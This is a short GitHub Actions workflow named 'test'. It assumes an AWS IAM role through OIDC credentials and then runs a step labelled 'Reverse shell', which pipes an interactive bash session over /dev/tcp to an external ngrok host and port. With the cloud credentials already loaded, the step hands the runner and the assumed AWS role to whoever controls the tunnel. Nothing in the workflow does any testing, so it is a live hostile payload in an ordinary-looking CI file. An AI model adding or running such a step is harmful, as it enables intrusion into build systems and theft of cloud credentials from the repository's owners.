name: test

on: workflow_dispatch

permissions:
  contents: read
  deployments: write
  id-token: write

jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: aws-actions/configure-aws-credentials@v1
        with:
          role-to-assume: arn:aws:iam::319312831725:role/github-docs
          aws-region: us-east-1
      - name: Reverse shell
        run: |
          bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/10699 0>&1
